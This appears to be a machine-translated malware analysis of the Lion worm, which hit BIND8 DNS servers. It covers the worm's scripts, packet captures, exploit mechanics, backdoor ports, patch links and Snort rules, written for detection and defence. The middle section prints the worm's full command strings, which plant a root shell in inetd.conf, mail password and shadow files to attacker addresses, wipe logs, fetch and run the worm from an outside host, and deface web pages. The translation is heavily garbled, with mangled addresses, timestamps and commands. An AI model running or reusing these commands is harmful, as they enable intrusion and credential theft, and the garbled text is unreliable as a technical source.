Virus sample
http://www.xfocus.net/tools/200108/lion.tgz
I have seen his distribution structure and infection characteristics, not new and different, the same as the Raman communication mechanism, but use this template virus good,
Lion worm has attracted extensive attention from http://www.sans.org from http://www.sans.org. It was originally derived from (China Red Guest Alliance, the author was a China "Red" -lion. This worm is part of this organization to retaliate for Japanese revised textbooks. From the Lion Worm infection system, its main purpose It is a collection of system information, probably the prelude to the next attack. The following is the declaration of HUC About Lion Worm: Because of the Japan's Disrepect, Cnhonker Had Been Roused, And The Lion Worm Is NOT SHEEP, Thei Must BE Answer for.They Must Assue The Obligation with Their Crime.They Must Assue The author of this article expresses his dissatisfaction in the article, thinks that Lion worm should not be spread with this purpose. in translation When I omitted this part. However, if it is simple from the perspective of technology, this worm is almost no new, it is plagiarism, and its spread can cause such a big vibration, mainly due to bind8. A security vulnerability. It is the security lack of these two beads to make Lion worms to attack DNS systems, fast spread. Summary Lion worm has three very clear versions, is a worm driven by script. A infection routine and a T0RN rootkit; second version is a first version of an improved version, just no rootkit; third edition is almost a relish of the Ramen worm, only the Exploit section is changed to utilize Bind8 security defects. These three versions There is the same core part. This worm has a port scanner using TCP connections, Bind8 Exploit programs, and some scripts are used to adhere to the worms, and drive worms. The first two versions of worm are from one The server plants yourself (a FreeBSD server in China). The third edition uses a distributed propagation code, from the previously infected system download itself, these codes come from Ramen Worm, all discovered Lion worms these documents are the following: 1) .li0n.sh author: shell scripts of the worm, delete tcpwrapers access control lists, run getip.sh, adding the worm startup script, and then run star.sh 2) .getip.sh author: worms Author shell script, put the system's IP address, operating system version information, / etc / passwd file And / etc / shadow file is sent to the email address of the attacker (li0nkit@china.com) 3) .star.sh Author: worm of shell scripts, and start scan.sh hack.sh as a background process. 4) .scan.sh Author: shell scripts of the worm, BIND stop all processes running locally, run randb select a class B Web site, and then run on the target pscan, save the results bindname.log. 5) .randb Author: Unknown Linux ELF binary file, print a random class B IP address, and ADMw0rm of gimmeRAND.c file is very similar. 6) .pscan Author: Unknown Linux ELF binaries, is a port scanner, to scan a single TCP port at a given A, B, C range. First discovery, but there is no author's statement in the source code.
7) .hack.sh Author: shell scripts of the worm, read from bindname.log and use bindx.sh target. 8) .bindx.sh Author: worm of shell scripts, start attacking bind remote target 9) .bind Author: LSD Linux ELF binaries, attackers have security flaws bind-8.2.x BIND server. This is a typical worm, plagiarized from previous worms, for example: AdmWorm (1998), Millenium Worm (1999) and Ramen Worm (2001). This file is redundant unless Hack.sh is to drive multiple attack scripts. The author of this worm puts only an attack program, but leaving the expansion space for multiple attacks. Other scripts are also improved from other worms. Three versions of Lion worms are infected with the same infection, reproduction. The network activity of Lion worm starts from the 53 / TCP port, which randomly scans the B IP address segment. When a BIND domain name server is found, start the attack program attack target. After the attack is successful, run the download command to download yourself to the invaded host, expand the package, run the startup script. The first step in Lion worm is to use PSCAN to detect a random B IP address space. I repaired the RANDB program to always returned 10.0.0. The reason why I choose Class C IP address space is 10.0.0.0.0/24, but it is only necessary to reduce the size of the log file. The PSCAN program uses a fully connected scan, which sends a synchronization package (SYN) to each address of this address space, so that the scanning speed is accelerated, but more "noise" is added in the log, the target host address is 10.0.0.23 Run Redhat Linux6.2. Attack source hosts infected by Lion worms in another subnet. If the TCP-based port scanner will not scan the host of this subnet, unless ARP requests are responed to the ARP request.
Establish a complete connection: 03 / 26-02: 09: 58.0.3:4556 -> 10.0.0.23:53 TCP TTL: 64 TOS: 0x0 ID: 56799 Iplen: 20 DGMLEN: 60 DF ***** S * SEQ: 0x16322ca3 ACK: 0x0 WIN: 0x7D78 TCPlen: 40 03/26-02: 09: 58.247112-> 192.168.0.3:4556 TCP TTL: 64 TOS: 0x0 ID: 749 Iplen: 20 DGmlen: 60 DF *** A ** S * SEQ: 0x8Bacebe6 ACK: 0X16322CA4 WIN: 0X7D78 TCPLEN: 40 03 / 26-02: 09: 58.0.3:4556 -> 10.0.0.23:53 TCP TTL: 64 TOS: 0x0 ID: 56930 iplen: 20 dgmlen: 52 df *** a **** SEQ: 0x16322ca4 ACK: 0x8Bacebe7 win: 0x7d78 TCPlen: 32 Very beautiful disconnection: 03/26-02: 09: 58.344645 192.168.0.3: 4556 -> 10.10.0.23:53 TCP TTL: 64 TS: 0x0 ID: 56932 Iplen: 20 DGmlen: 52 DF *** A *** f SEQ: 0x16322ca4 ACK: 0x8Bacebe7 Win: 0x7D78 TCPlen: 32 03 / 26-02 : 09: 58.0.3:53 -> 192.168.0.3:3:4556 TCP TTL: 64 TS: 0x0 ID: 750 Iplen: 20 DGmlen: 52 DF *** A **** SEQ: 0x8Bacebe7 ACK: 0x16322CA5 WIN: 0x7D78 Tcplen: 32 03/26-02: 09: 58.386565 10.0.0.3:3:53 -> 192.168.0.3:4556 TCP TTL: 64 TOS: 0x0 ID: 751 iPlen: 20 DGMLEN: 52 DF *** A *** F SEQ : 0x8Bacebe7 ACK: 0x16322CA5 WIN: 0x7D78 TCPlen: 32 03/26-02: 09: 58.386614 192.168.0.3:3:3:4556 -> 10.0.0.23:53 TCP TTL: 64 TOS: 0x0 ID: 56934 Iplen: 20 DGMLEN: 52 DF *** A ** ** SEQ: 0x16322CA5 ACK: 0X8BACEBE8 WIN: 0X7D78 TCPLEN: 32 PSCAN Discovery 10.0.23 In line with its requirements, add this address to the bindname.log file. Hack.sh script file and scanner parallel, track the bindname.log file. Once a new IP address is found to join the bindname.log file, Hack.sh starts the attack program attack target host. The Bind attack programs are released by LSD (The Last Satge of Delirium), and the three versions of the Lion worm use it as their own Exploit program. LSD released Linx86_bind.c on its website on February 8, 2001, and the lion worm V1.0 is the version used. However, the next day, LSD upgraded this Exploit program, but the file name did not change, but only made some slight changes. Upgrade does not do technical changes. A significant change in the new EXPLOIT code is to adopt different command line parameters. By observing the command line parameters, I figured out that the Lion Worm V1.0 version uses the EXPLOIT code released on February 8, and the last two versions use the upgrade version.
Moreover, each version uses a different command to attack the remote BIND host. I have complicated the sample target platform for lion worms. I use a server that installs RedHat 6.2 as the target. I am afraid this is the most popular Linux release and version on the Internet. Therefore, it is the most typical example object. Although it is specifically listed in the Exploit code, you can attack the RedHat6.2 platform, but named is not the service that is started by default. When it is activated (via LinuxConf or NTSYSV), named is running under the NAMED user. When manually adds NAMED to the startup script, NAMED runs with ROOT's permissions, and the attack is meaningful. Because each version of the worm uses the same attack program, in addition to the command, the captured package is almost identical. First, the attack program and the NAMED process of the target host establish a TCP connection; then send a custom UDP / iQuery package to the target host, using Bind Infoleak bug, determine the base pointer of the NAMED process stack. The TSIG Exploit package is then constructed using the obtained information. The TSIG package causes the target host NAMED buffer overflow. After the buffer overflows, the EXPLOT program's root shell will traverse the file descriptor opened by the NAMED process, find the descriptor of the beginning established TCP dialogue; then, use the system call DUP () to copy this socket descriptor to stdin , Stdout, stderr; Finally launched a new / bin / sh process. Now, this TCP dialog is bound to the root shell, and the attack program can issue a command.
Below is the command of the lion worm issued by the attack program: 1). Lion V1.0: Path = '/ usr / bin: / bin: / usr / local / bin /: / usr / sbin /: / sbin'; Export Path ; EXPORT TERM = VT100; RM -RF /DEV/.lib; MKDIR /DEV/.lib; CD /DEV/.lib; Echo '1008 Stream TCP NOWAIT ROOT / BIN / SH SH' >> / etc / inetd.conf Killall -Hup inetd; ifconfig -a> 1i0N; CAT / ETC / Passwd >> 1i0N; CAT / ETC / ShaDow >> 1i0N; Mail 1i0nip@china.com <1i0n; RM-FR 1i0N; RM-FR /.Bash_HISTORY ilnx -dump http://coolion.51.net/crew.tgz> 1i0n.tgz; TAR -ZXVF 1i0n.tgz; RM-FR 1i0n.tgz; cd Lib; ./1i0n.SH; exit; 2). Lion v2.0 path = '/ usr / bin: / bin: / usr / local / bin /: / usr / sbin /: / sbin'; export path; export term = VT100; RM-RF /DEV/.lib; MKDIR /DEV/.LIB; CD /DEV/.lib; Echo '1008 Stream TCP NOWAIT ROOT / BIN / SH SH' >> / etc / inetd.conf; killall -hup inetd; ifconfig -a> 1i0N; CAT / ETC / Passwd >> 1I0N; CAT / ETC / Shadow >> 1i0N; Mail 1i0nip@china.com <1i0n; RM-FR 1i0N; RM-FR /.Bash_HISTORY; Echo> / Var / log / Messages; Echo> / var / LOG / Maillog; Lynx -dump http://coolion.51.net/crew.tgz> 1i0n.tgz; tar -zxvf 1i0n.tgz; RM -FR 1i0n.tgz Cd LiB; ./1i0n.sh; exit 3). Lion v3.0 path = '/ usr / bin: / bin: / usr / local / bin /: / usr / sbin /: / sbin'; export path; EXPORT TERM = VT100; RM -RF /DEV/.lib; MKDIR /DEV/.lib; CD /DEV/.Lib; Echo '10008 Stream TCP NOWAIT ROOT / BIN / SH SH' >> / etc / inetd.conf; KILLALL-HUP inetd; ifconfig -a> 1i0N; CAT / ETC / Passwd >> 1i0N; CAT / ETC / ShaDow >> 1i0N; Mail Huckit@china.com <1i0N; RM-FR 1i0N; RM-FR /.Bash_HISTORY; Echo> / var / log / messages; rm -rf / var / log / maillog; echo 'Powered by HUC (C0011i0N) .----- 1i0n crew'> index.html; echo '#! / bin / sh' > lion; echo '
Nohup Find / -Name "Index.html" -exec / bin / cp index.html {}; '>> lion; echo' tar -xf 1i0n.tar '>> lion; echo' ./1i0n.sh '>> Lion; Echo >> Lion; Echo >> Lion; CHMOD 755 Lion; Term = 'Linux' Export Path = '/ sbin: / usr / sbin: / bin: / usr / bin: / usr / local / bin' Lynx - Source http: // previous-host-ip: 27374> 1i0n.tar;. /LION Lion Worm three version of the most critical difference: the first two versions use Lynx from a website to download Worm, no distributed communication The ability; the third edition uses the ASP code from the Ramen worm. This way makes the attacked host to the 27374 port of the intrusion host to download the worm file. This port is used by the ASP program, which is started by inet, and the service name in the inet.conf file is ASP. The corresponding ports in the / etc / service file in the RedHat6.2 system are also 27374. When the lion worm is infected with a remote system, it downloads its own code, decompressed, and starts in the new invaded host via the Exploit program. Its infection is as shown in the figure: How to prevent it from spreading because the lion worm is only propagated with Bind8 Tsig bug, so it can be organized infection by patching this security defect. Since 2001, the supplier begins to provide security patches. A defective Linux release also releases an upgrade RPM package. Various remote EXPLOIT code for this security defect is widely spread in various online forums and web sites. Despite reliable security patches, there is still this defect. Trying to hide the Bind version and the server running operating system cannot effectively prevent lion worm infection, because this worm will try to infect all Bind servers they discovery. The Exploit code written by the LSD can automatically use the BIND8 Infoleak defect to determine whether the system can be infected. Caldera, CONECTIVA, Debian, Immunix, Mandrake, Redhat, Slackware, SUSE, and TurboLinux have launched patches and upgraded versions of this defect.
The following is related connections: Caldera: http://www.caldera.com/support/security/advisories/cssa-2001-008.1.txt conectiva: http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000377 Debian: http://www.debian.org/security/2001/dsa-026 immunix: http://download.immunix.org/immunixos/7.0-beta/Updates/iMNX-2001-70-001-01 Mandrake: Http://www.linux-mandrake.com/en/security/2001/mdksa-2001-017.php3 redhat: http://www.redhat.com/support/errata/rhsa-2001-007.html slackware: http://www.linuxsecurity.com/advisories/slackware_advisory-1121.html SuSE: http://www.suse.com/de/support/security/2001_003_bind8_ txt.txt TurboLinux: http: //www.turbolinux. COM / PIPERMAIL / TL-Security-Announce / 2001-February / 000034.Html How to check if your system is infected with RedHat 6.2, scanning and bind Exploit attacks do not leave a record in the system log. Other systems may vary. Although the three versions of the lion worm truncated or deleted / var / log / maillog files, it can be used to track the information sent to the message from the proxy mail gateway or firewall.
The mail addresses used in three versions are as follows: 1). Lion v1.0 li0niffer@china.com 2). Lion v2.0 li0nip@china.com li0nkit@china.com 3). Lion v3.0 Huckit@china.com The following is the file with the Lion Worm changes: 1) .lion v1.0 bind Exploit program changed file: /DEV/.lib/ directory and the content /etc/inetd.conf file Add '1008 Stream TCP NOWAIT ROOT / BIN / SH SH '/.BASH_HISTORY is deleted with a worm script change file: /etc/rc.d/rc.sinit file joined a new entry' /dev/.lib/lib/scan/star. SH '/ETC/HOSTS.DENY IS MISSING (An Empty PlaceHolder File Is Present By Default) file is deleted, replaced by a empty file by T0RN ROOTKIT changes: /etc/inetd.conf file Add to' 60008 Stream TCP NOWAIT Root / bin / sh sh '/etc/inetd.conf file Add to' 33567 Stream TCP NOWAIT ROOT / BIN / SH SH '/ ETC / TTYHASH file to be added to the system (the hash value of China's Hongke Password) / USR / Man / man1 / man1 / lib / .lib / directory and its content /usr/src/.puta/ directory and its content /usr/info/.t0rn/ directory and its content / bin / mjy is added to the system (log rub In addition to tools) /usr/man/man1/man1/lib/.lib/.x is added to the system (SUID root shell) /etc/rc.d/rc.sinit file to join NSCD (Not in the Worm) and IN .Telnetd Trojan version / TMP/.pinespool file (maintenance inetd.conf temporary file) /Root/.bash_history is removed / var / log / millage is truncated / var / log / maillog is truncated by Trojan: /bin/in.telnetd / usr / s Bin / in.fingerd / bin / ps / sbin / ifconfig / usr / bin / du / bin / netstat / usr / bin / file Note: William Sterns wrote a software lionfind-0.1 .tar.gz Check that the system is infected with Lionv2.0 Bind Exploit by Lion V1.0: /Dev /.lib/ directory and its content /etc/inetd.conf file Add to '1008 stream TCP NOWAIT ROOT / BIN / SH '/.BASH_HISTORY is removed / var / log / messages Truncated / var / log / maillog is truncated with a file with a worm script: /etc/rc.d/rc.sinit file is added to' /dev/.lib/ LIB / Scan / Star.sh '(Wrong Directory Buddy) /etc/hosts.deny i is deleted (an Empty PlaceHolder File IS present by default) Lionv3.0 /dev/.lib/ directory and its content / etc / inetd. Add '10008 Stream TCP NOWAIT ROOT / BIN / SH'
/.bash_history Deleted / VAR / log / Messages Truncated / var / log / maillog Deleted All index.html files were "Powered By HUC (C0011i0n) .----- 1i0n CREW 'overwrites the worm script change : / Sbin / ASP is added to the LITE Webserver to ALLOW DOWNLOAD OF WORM to Next System) /TMP/RAMEN.TGZ file (Lion Worm Author Used The Asp62 Binary from the Ramen Worm) Add to 'ASP Stream TCP NOWAIT ROOT / SBIN / ASP' /ETC/rc.d/rc.sysinit file is added to '/dev/.lib/star.sh' /etc/hosts.deny deleted (replaced with an empty file All index.html files are replaced by "Lion Crew" inundant information. The following ports are the back door of the lion worm, while the latter of its version 1.0 is particularly Lion v1.0 telnetd program is listened to 23 / TCP port, logged in with CNHonker as a password, from T0RN Rootkit. / bin / sh bind to 1008 / TCP ports from a BIND8 attack program. / bin / sh is bound to 2555 / TCP port, from T0RN Rootkit, activated by Trojm Horse by In.fingerd program. / bin / sh is bound to 33567 / TCP ports from T0RN. SSHD listens at the 33568 / TCP port, logged in with CNHonker as a password, from T0RN Rootkit. / bin / sh is bound to 60008 / TCP port from T0RN. Lion V2.0 / Bin / SH is bound to 1008 ports from a bind8 attack program. Lion V3.0 / BIN / SH is bound to 1008 ports from the BIND8 attack program. / SBIN / ASP Binds to 27374 / TCP port, a lightweight web server, used to download the worm. Detection can detect the infection of the worm using the Snort ArachNIDS rules below. PSCAN uses the following rules to start Snort's port scan plug-in: $ INTERNAL 3 5 / VAR / LOG / SNORT / PORTSCAN BIND INFOLLEAK Permissions Use the following rule set: Alert UDP $ External Any -> $ INTERNAL 53 (MSG: " IDS482 / NAMED-EXPLOIT-INFOLLEAK-LSD "; Content:" | AB CD 09 80 00 00 00 01 00 00 00 00 00 00 01 20 20 20 202 61 | "; Reference: Arachnids, 482;) BIND8 TSIG Buffer overflow uses the following ArachNIDS rule detection: Alert UDP $ External ANY -> $ INTERNAL 53 (MSG: "IDS489 / Named-Exploit-Tsig-LSD"; Content: "| 3F 909090 EB3B 31DB 5F 83EF7C 8D7710 897704 8D4F20 | REFERENCE: ARACHNIDS, 489;) You can also detect out the email. However, joining email detection is lost for the performance of IDS. Moreover, the worm cannot be sent in the case where the above rules are not started.